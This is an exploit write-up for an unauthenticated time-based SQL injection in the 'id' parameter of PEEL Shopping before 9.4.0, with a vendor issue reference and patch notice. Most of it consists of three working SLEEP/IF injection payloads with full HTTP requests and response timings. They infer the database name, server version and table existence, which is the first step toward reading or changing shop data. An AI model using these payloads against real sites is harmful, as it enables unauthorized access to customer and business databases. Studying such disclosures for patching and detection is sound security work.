# Exploit Title: PEEL Shopping 9.3.0 - 'id' Time-based SQL Injection # Date: 2021-07-10 # Exploit Author: faisalfs10x (https://github.com/faisalfs10x) # Vendor Homepage: https://www.peel.fr # Software Link: https://sourceforge.net/projects/peel-shopping/files/peel-shopping_9_3_0.zip/download # Version: prior to 9.4.0 # Tested on: Windows 10, XAMPP # Reference: https://github.com/advisto/peel-shopping/issues/3 ################ # Description # ################ # PEEL Shopping is an eCommerce shopping cart application in PHP / MySQL which works on any hosting. Public user/guest (unauthenticated) can inject malicious SQL query in order to affect the execution of predefined SQL commands via the "id" parameter on the "/peel-shopping_9_4_0/achat/produit_details.php?id=[SQLi]" endpoint. Upon successful of SQL injection attack, attacker can read sensitive data from the database or modify database data. ##################### # PoC of detection # ##################### 1) Assumed peel-shopping_9_4_0 out of box installation database name is peel. This query will check if database() name like hex(%peel%) - it will delay for 7 seconds before redirect to homepage (http://localhost/peel-shopping_9_4_0/) that indicates TRUE SQL statement which mean the database name like "peel". PoC #1) param id - time-based SQLi Payload: (SELECT+1337+FROM+(SELECT(SLEEP(7-(IF(DATABASE()+LIKE+0x257065656c25,0,5)))))FSXX) Request: The response duration = 418 bytes | 7,719 millis ======== GET /peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELECT(SLEEP(7-(IF(DATABASE()+LIKE+0x257065656c25,0,5)))))FSXX) HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/peel-shopping_9_4_0/ DNT: 1 Connection: close Cookie: OCSESSID=3b7c67760a18581016f7c4f5fb; language=en-gb; currency=USD; sid7cc7e9c2=07dnj7pgglunl1ei5r3ikeno5inu1gsc; last_views=a%3A1%3A%7Bi%3A0%3Bi%3A15%3B%7D; __atuvc=1%7C28; __atuvs=60eaece0c300734f000 Upgrade-Insecure-Requests: 1 Sec-GPC: 1 Cache-Control: max-age=0 --- 2) Assumed the web is using MariaDB database server - check if db_version like hex(%MariaDB%), it will delay for 5 seconds if TRUE. PoC #2) param id - time-based SQLi Payload: (SELECT+1337+FROM+(SELECT(SLEEP(5-(IF(VERSION()+LIKE+0x254d61726961444225,0,5)))))FSXX) Request: The response duration = 418 bytes | 5,112 millis ======== GET /peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELECT(SLEEP(5-(IF(VERSION()+LIKE+0x254d61726961444225,0,5)))))FSXX) HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/peel-shopping_9_4_0/ DNT: 1 Connection: close Cookie: OCSESSID=3b7c67760a18581016f7c4f5fb; language=en-gb; currency=USD; sid7cc7e9c2=07dnj7pgglunl1ei5r3ikeno5inu1gsc; last_views=a%3A1%3A%7Bi%3A0%3Bi%3A15%3B%7D; __atuvc=1%7C28; __atuvs=60eaece0c300734f000 Upgrade-Insecure-Requests: 1 Sec-GPC: 1 Cache-Control: max-age=0 --- 3) By default, the database have a table name = peel_produits. This query will check if table_name peel_produits is exist, it will delay for 10 seconds if TRUE, else will redirect to homepage instantly. PoC #3) param id - time-based SQLi Payload: (SELECT+1337+FROM+(SELECT(SLEEP(10-(IF(EXISTS(SELECT+3+FROM+peel.peel_produits),0,5)))))FSXX) Request: The response duration = 418 bytes | 10,140 millis ======== GET /peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELECT(SLEEP(10-(IF(EXISTS(SELECT+3+FROM+peel.peel_produits),0,5)))))FSXX) HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/peel-shopping_9_4_0/ DNT: 1 Connection: close Cookie: OCSESSID=3b7c67760a18581016f7c4f5fb; language=en-gb; currency=USD; sid7cc7e9c2=07dnj7pgglunl1ei5r3ikeno5inu1gsc; last_views=a%3A1%3A%7Bi%3A0%3Bi%3A15%3B%7D; __atuvc=1%7C28; __atuvs=60eaece0c300734f000 Upgrade-Insecure-Requests: 1 Sec-GPC: 1 Cache-Control: max-age=0 --- # For more explaination, you can refer to the github issue on peel-shopping via https://github.com/advisto/peel-shopping/issues/3. # The affected version is prior to 9.4.0. Now it is fixed on version 9.4.0.1 # The vendor has released the latest patched version on 9.4.0.1 that is available for download from sourceforge.net[https://sourceforge.net/projects/peel-shopping/files/peel-shopping_9_4_0_1.zip/download]